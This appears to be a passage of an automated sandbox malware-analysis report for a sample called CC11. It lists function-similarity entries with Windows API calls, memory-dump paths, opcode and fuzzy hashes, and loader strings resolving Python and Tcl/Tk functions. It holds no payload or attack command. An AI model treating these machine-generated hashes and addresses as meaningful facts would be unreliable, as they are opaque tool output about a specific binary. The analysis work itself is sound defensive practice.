                                                                                                                                                                  • Instruction Fuzzy Hash: 0501C021A0C78251EA64DB769900079A6A5FF95FE4F4846B1EE6C93BDEDF3CE5028300
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                  • Opcode ID: bb049028caba5e04dba667320418798f18563eb801bd7df1d5910388d10efff1
                                                                                                                                                                  • Instruction ID: 1747a42b1977428d387b5c706ccc80086b40d600f1935b0e445f9fda16467a8b
                                                                                                                                                                  • Opcode Fuzzy Hash: bb049028caba5e04dba667320418798f18563eb801bd7df1d5910388d10efff1
                                                                                                                                                                  • Instruction Fuzzy Hash: 6D015220E0D683A1FEB4AB7A65421792290EF55794F5445F8FA6CC2BCEDF3CE4868211
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                  • Opcode ID: c51c900cc97cfaa1f2463de7ded10a88eb35566439d91f89b12c497efef6b613
                                                                                                                                                                  • Instruction ID: bce0b59ecb6e58c42e6a028695a7a011ec7e93b2c32a09db9b0b7ffdd144eaf4
                                                                                                                                                                  • Opcode Fuzzy Hash: c51c900cc97cfaa1f2463de7ded10a88eb35566439d91f89b12c497efef6b613
                                                                                                                                                                  • Instruction Fuzzy Hash: 03E01290E4864762FA35BABC49C327D9150EF64350F8040B4D90CC63CFDD5CF89B9621
                                                                                                                                                                  APIs
                                                                                                                                                                  • HeapAlloc.KERNEL32(?,?,00000000,00007FF69002A63A,?,?,?,00007FF6900243FD,?,?,?,?,00007FF69002979A), ref: 00007FF69002DEFD
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AllocHeap
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4292702814-0
                                                                                                                                                                  • Opcode ID: a50505f3dedbf875c6adc223253d20fad35851e197ada73c0c4444ee90b671f1
                                                                                                                                                                  • Instruction ID: d6dc1a38befb50bf0805b29f24de0a57b3cde77dc6b4072df292dc8cca5dc007
                                                                                                                                                                  • Opcode Fuzzy Hash: a50505f3dedbf875c6adc223253d20fad35851e197ada73c0c4444ee90b671f1
                                                                                                                                                                  • Instruction Fuzzy Hash: 2FF09654F09347A0FE75677A59513B51291DF58B40F4C40B2D90ECA7CEDD1CE9478210
                                                                                                                                                                  APIs
                                                                                                                                                                  • HeapAlloc.KERNEL32(?,?,?,00007FF69001FFB0,?,?,?,00007FF69002161A,?,?,?,?,?,00007FF690022E09), ref: 00007FF69002C94A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AllocHeap
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4292702814-0
                                                                                                                                                                  • Opcode ID: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
                                                                                                                                                                  • Instruction ID: 08999c98d486a7a6c1b3ea8ee17394ec9f43ee3abe5a5cc644e4f4fca7e2f6ad
                                                                                                                                                                  • Opcode Fuzzy Hash: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
                                                                                                                                                                  • Instruction Fuzzy Hash: 4FF01C11F19287A5FE7567BA5859B791280DF88BA0F4846B0DD2EC67CDDE2CE5828210
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3140674995-0
                                                                                                                                                                  • Opcode ID: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
                                                                                                                                                                  • Instruction ID: 6e3b296df5b792b3ce2b770a0103b577d5eee7f756f0895939c08f0f5dc19ae8
                                                                                                                                                                  • Opcode Fuzzy Hash: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
                                                                                                                                                                  • Instruction Fuzzy Hash: 23312A72608A8196EB709F64E890BEE7361FB88748F04417ADB4D87B99DF38D548C710
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Message$ErrorFormatLast
                                                                                                                                                                  • String ID: %ls%ls: %ls$<FormatMessageW failed.>$Error
                                                                                                                                                                  • API String ID: 3971115935-1149178304
                                                                                                                                                                  • Opcode ID: 0ded6d4e5eeb2df7dd6c32992adf891535d6bffb348d119068df09e90069f5ad
                                                                                                                                                                  • Instruction ID: f7e6f0c8486276df5c64299267a43f10cd3c0e44f38c4daa40fc890f1ce665e7
                                                                                                                                                                  • Opcode Fuzzy Hash: 0ded6d4e5eeb2df7dd6c32992adf891535d6bffb348d119068df09e90069f5ad
                                                                                                                                                                  • Instruction Fuzzy Hash: 34212172618A85A2E7319B20F4506EA7365FB88788F400136EBCD93B9CDF7CD5468B40
                                                                                                                                                                  APIs
                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF690034F55
                                                                                                                                                                    • Part of subcall function 00007FF6900348A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6900348BC
                                                                                                                                                                    • Part of subcall function 00007FF690029C58: RtlFreeHeap.NTDLL(?,?,?,00007FF690032032,?,?,?,00007FF69003206F,?,?,00000000,00007FF690032535,?,?,?,00007FF690032467), ref: 00007FF690029C6E
                                                                                                                                                                    • Part of subcall function 00007FF690029C58: GetLastError.KERNEL32(?,?,?,00007FF690032032,?,?,?,00007FF69003206F,?,?,00000000,00007FF690032535,?,?,?,00007FF690032467), ref: 00007FF690029C78
                                                                                                                                                                    • Part of subcall function 00007FF690029C10: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF690029BEF,?,?,?,?,?,00007FF690029ADA), ref: 00007FF690029C19
                                                                                                                                                                    • Part of subcall function 00007FF690029C10: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF690029BEF,?,?,?,?,?,00007FF690029ADA), ref: 00007FF690029C3E
                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF690034F44
                                                                                                                                                                    • Part of subcall function 00007FF690034908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF69003491C
                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF6900351BA
                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF6900351CB
                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF6900351DC
                                                                                                                                                                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF69003541C), ref: 00007FF690035203
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4070488512-0
                                                                                                                                                                  • Opcode ID: 0d3b627969e88128c8faa99a2c0e5d438b7f33ec3044a67c5b643e0657b8cf50
                                                                                                                                                                  • Instruction ID: 8ee1f5a5fa18e315eaa4c09cd2f6a4207f63ac7a416a9c4f7edcc726ab730b38
                                                                                                                                                                  • Opcode Fuzzy Hash: 0d3b627969e88128c8faa99a2c0e5d438b7f33ec3044a67c5b643e0657b8cf50
                                                                                                                                                                  • Instruction Fuzzy Hash: EFD1CD26E08242A6EB35AF36D850ABD63A1EF89784F444076EA0DC7B9DDF3CE441C740
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1239891234-0
                                                                                                                                                                  • Opcode ID: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
                                                                                                                                                                  • Instruction ID: 7571340e09dacc5694d6e7fe316bb15b811628a7ed369b3f96eaa17f06741a37
                                                                                                                                                                  • Opcode Fuzzy Hash: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
                                                                                                                                                                  • Instruction Fuzzy Hash: 24314E36A18B8196DB60CF39E8406AE73A4FB88758F540275EA9D87B99DF3CD145CB00
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2227656907-0
                                                                                                                                                                  • Opcode ID: fe4d16d24a501c342f9bdefd2dbf7b3c8df5536519bece05b709b84cd6c1ed58
                                                                                                                                                                  • Instruction ID: 78469d1220ff25ba6e4145801ff1408b35cefc5135df6680f8017bc7bc318677
                                                                                                                                                                  • Opcode Fuzzy Hash: fe4d16d24a501c342f9bdefd2dbf7b3c8df5536519bece05b709b84cd6c1ed58
                                                                                                                                                                  • Instruction Fuzzy Hash: 5BB1F322B1A69291EA72DB75D420ABD63A0EB48BE4F445171EE5E87BCDDF3CE451C300
                                                                                                                                                                  APIs
                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF6900351BA
                                                                                                                                                                    • Part of subcall function 00007FF690034908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF69003491C
                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF6900351CB
                                                                                                                                                                    • Part of subcall function 00007FF6900348A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6900348BC
                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF6900351DC
                                                                                                                                                                    • Part of subcall function 00007FF6900348D8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6900348EC
                                                                                                                                                                    • Part of subcall function 00007FF690029C58: RtlFreeHeap.NTDLL(?,?,?,00007FF690032032,?,?,?,00007FF69003206F,?,?,00000000,00007FF690032535,?,?,?,00007FF690032467), ref: 00007FF690029C6E
                                                                                                                                                                    • Part of subcall function 00007FF690029C58: GetLastError.KERNEL32(?,?,?,00007FF690032032,?,?,?,00007FF69003206F,?,?,00000000,00007FF690032535,?,?,?,00007FF690032467), ref: 00007FF690029C78
                                                                                                                                                                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF69003541C), ref: 00007FF690035203
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3458911817-0
                                                                                                                                                                  • Opcode ID: ae64d4b013316384daf219013b3406c3cfe35626df30cbdeb691f729cbc9c9de
                                                                                                                                                                  • Instruction ID: 7d8dc545302b253465d7f88f5baa9e1cf3cbb23d1cbadd4d9b2b296aa1b6f2ab
                                                                                                                                                                  • Opcode Fuzzy Hash: ae64d4b013316384daf219013b3406c3cfe35626df30cbdeb691f729cbc9c9de
                                                                                                                                                                  • Instruction Fuzzy Hash: 5F517A36E18642A6E731DF32E8909A977A0FB49784F4045B5EA0DC77AADF3CE441C740
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF690015C57,?,00007FF69001308E), ref: 00007FF6900150C0
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF690015C57,?,00007FF69001308E), ref: 00007FF690015101
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF690015C57,?,00007FF69001308E), ref: 00007FF690015126
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF690015C57,?,00007FF69001308E), ref: 00007FF69001514B
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF690015C57,?,00007FF69001308E), ref: 00007FF690015173
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF690015C57,?,00007FF69001308E), ref: 00007FF69001519B
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF690015C57,?,00007FF69001308E), ref: 00007FF6900151C3
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF690015C57,?,00007FF69001308E), ref: 00007FF6900151EB
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF690015C57,?,00007FF69001308E), ref: 00007FF690015213
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc
                                                                                                                                                                  • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                  • API String ID: 190572456-2007157414
                                                                                                                                                                  • Opcode ID: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
                                                                                                                                                                  • Instruction ID: 7648b33edeb82bdd0ab73a370428ccc24d8207c64474ae216970e21b1c2e257d
                                                                                                                                                                  • Opcode Fuzzy Hash: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
                                                                                                                                                                  • Instruction Fuzzy Hash: DF12A465D0EB03F1FA7A9BB5A8509B423A1EF0C749B9414B5D80ED63A8EF3CF5489340
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc
                                                                                                                                                                  • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                  • API String ID: 190572456-3427451314
                                                                                                                                                                  • Opcode ID: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
                                                                                                                                                                  • Instruction ID: 7c3918bf6be1ac06e90ac3ed181f4d6d5e203b6e854cd0e62e806de96d163347
                                                                                                                                                                  • Opcode Fuzzy Hash: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
                                                                                                                                                                  • Instruction Fuzzy Hash: 54E1A96890DB03B1FA7AAB75B8505B523A5EF08758F9411B6D85EC23ACEF3CE558D300
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00007FF6900186B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF690013FA4,00000000,00007FF690011925), ref: 00007FF6900186E9
                                                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(?,00007FF690017C97,?,?,FFFFFFFF,00007FF690013834), ref: 00007FF69001782C
                                                                                                                                                                    • Part of subcall function 00007FF6900126C0: MessageBoxW.USER32 ref: 00007FF690012736
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                  • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                  • API String ID: 1662231829-930877121
                                                                                                                                                                  • Opcode ID: 5adf1a7b4f365c991e592d6daa758356e56cb82b092043d5b28c068608273831
                                                                                                                                                                  • Instruction ID: ac90fb5e6628dfd6d958615af6f094d653f8b4ea7023b876f7e75e277221f3af
                                                                                                                                                                  • Opcode Fuzzy Hash: 5adf1a7b4f365c991e592d6daa758356e56cb82b092043d5b28c068608273831
